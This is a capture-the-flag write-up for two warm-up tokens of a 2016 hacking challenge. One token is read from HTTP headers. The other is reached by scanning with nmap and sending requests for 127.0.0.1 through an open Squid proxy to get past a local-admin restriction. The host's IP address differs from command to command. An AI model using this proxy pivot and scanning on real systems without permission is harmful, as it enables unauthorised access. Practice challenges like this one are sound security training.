usd hacking challenge 2016 writeup: tokens 1 and 2
I found the gradual increase in difficulty quite nice in this challenge. The first two tokens were for warm-up.
Token 1 - gotta get our heads just right
Within the first few seconds of this engagement, I had already looked at the HTTP response headers of the site. So there it was, the first token in plain sight:
js@eris:~/usdhc$ curl -I http://188.8.131.52/index.php HTTP/1.1 200 OK Date: Sat, 19 Mar 2016 21:55:22 GMT Server: Apache Token: 583397 Content-Type: text/html; charset=UTF-8
Token 2 - no place like 127.0.0.1
js@eris:~/usdhc$ curl http://184.108.40.206/restricted/ <!DOCTYPE html> <html> <head> <title>usd Hackertag Challenge Webseite</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" > [..] <div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div> [..]
Only local admins? I did think of what turned out to be the solution right when I read this, but started to poke around aimlessly with cookies, parameters, hidden files etc. first. I even did a fruitless nikto scan. The next morning it occurred to me I had not even done a basic port scan of the challenge site, so without expecting too much I fired up nmap:
js@eris:~/usdhc$ nmap -A 220.127.116.11 Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-19 22:01 CET Nmap scan report for 18.104.22.168 Host is up (0.022s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: usd Hackertag Challenge Webseite 3128/tcp open http-proxy Squid http proxy 3.4.8 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: ERROR: The requested URL could not be retrieved Aggressive OS guesses: Netgear DG834G WAP or Western Digital WD TV media player (92%), Linux 2.6.32 - 2.6.36 (90%), Linux 3.1 (89%), Linux 3.2 (89%), AXIS 210A or 211 Network Camera (Linux 2.6) (88%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (88%), Linux 3.7 - 3.9 (88%), ODROID-U2 Android development board (Linux 3.0) (88%), Linux 2.6.32 (88%), Linux 3.6.10 (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 8 hops
Oh, Squid! Let's see:
js@eris:~/usdhc$ curl -sx http://22.214.171.124:3128 http://localhost/restricted/ | grep -i token <div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>
Hmm. Seemed I could connect through the proxy, but still no token. How about this:
js@eris:~/usdhc$ curl -sx http://126.96.36.199:3128 http://127.0.0.1/restricted/ | grep -i token <div id="contentliquid"><div id="content">Token: 134923</div></div>
Home, sweet home.